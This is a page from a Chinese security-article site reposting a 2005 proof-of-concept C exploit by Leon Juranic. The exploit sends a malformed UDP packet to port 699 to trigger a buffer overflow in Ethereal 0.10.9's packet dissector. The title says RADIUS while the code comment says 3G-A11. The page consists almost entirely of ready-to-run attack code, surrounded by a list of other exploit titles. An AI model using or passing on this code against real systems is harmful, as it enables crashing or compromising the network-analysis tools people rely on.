Ethereal v0.10.9 RADIUS Auth. Remote Buffer Overflow Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Ethereal v0.10.9 RADIUS Auth. Remote Buffer Overflow Exploit

来源：http://security.lss.hr/en 作者：Leon 发布时间：2005-03-09

Ethereal v0.10.9 RADIUS Auth. Remote Buffer Overflow Exploit

/*
*
* Ethereal 3G-A11 remote buffer overflow PoC exploit
* --------------------------------------------------
* Coded by Leon Juranic <ljuranic@lss.hr>
* LSS Security <http://security.lss.hr/en/>
*
*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

main (int argc, char **argv)
{
int sock;
struct sockaddr_in sin;
unsigned char buf[1024];
char bla[200];

sock=socket(AF_INET,SOCK_DGRAM,0);

sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(699);

buf[0] = 22;
memset(buf+1,'A',19);
buf[20] = 38;
*(unsigned short*)&buf[22] = htons(100);
*(unsigned short*)&buf[28] = 0x0101;
buf[30] = 31;
buf[31] = 150; // len for overflow...play with this value if it doesn't work

memset (bla,'B',200);
strncpy (buf+32,bla,180);

sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告